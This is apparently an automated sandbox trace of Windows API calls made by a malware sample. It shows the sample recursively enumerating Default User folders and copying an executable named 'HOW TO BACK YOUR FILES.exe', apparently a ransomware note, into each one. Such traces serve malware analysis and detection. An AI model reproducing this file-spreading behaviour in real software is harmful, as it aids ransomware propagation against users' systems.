[0078.609] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.609] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.609] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.609] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.609] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer" [0078.609] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer" [0078.609] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.609] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.610] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.610] GetLastError () returned 0x0 [0078.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.610] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.610] CloseHandle (hObject=0x118) returned 1 [0078.610] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.611] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.611] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.611] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.611] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache" [0078.611] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache" [0078.611] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.611] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.612] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.612] GetLastError () returned 0x0 [0078.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.612] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.612] CloseHandle (hObject=0x118) returned 1 [0078.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.612] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.612] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.612] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.612] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0078.613] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.613] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.613] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.613] GetLastError () returned 0x0 [0078.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.613] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.613] CloseHandle (hObject=0x118) returned 1 [0078.614] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.614] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.614] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.614] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.614] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.614] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0078.614] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.614] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.615] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.615] GetLastError () returned 0x0 [0078.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.615] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.615] CloseHandle (hObject=0x118) returned 1 [0078.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.615] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.615] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.615] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.616] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.616] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0078.616] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.616] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.616] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.616] GetLastError () returned 0x0 [0078.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.617] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.617] CloseHandle (hObject=0x118) returned 1 [0078.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.617] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.617] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.617] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.617] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.617] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR" [0078.617] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.625] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.625] GetLastError () returned 0x0 [0078.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.625] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.626] CloseHandle (hObject=0xa4) returned 1 [0078.626] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.626] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.626] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.626] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.626] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds" [0078.626] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds" [0078.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.627] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.627] GetLastError () returned 0x0 [0078.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.627] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.627] CloseHandle (hObject=0xa4) returned 1 [0078.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.628] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.628] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.628] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.628] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0078.628] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.628] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.629] GetLastError () returned 0x0 [0078.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.629] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.629] CloseHandle (hObject=0xa4) returned 1 [0078.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.629] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.629] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.630] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.630] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0078.630] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.630] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.630] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0078.630] GetLastError () returned 0x0 [0078.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.630] ReadFile (in: hFile=0xa4, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.631] CloseHandle (hObject=0xa4) returned 1 [0078.631] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.631] 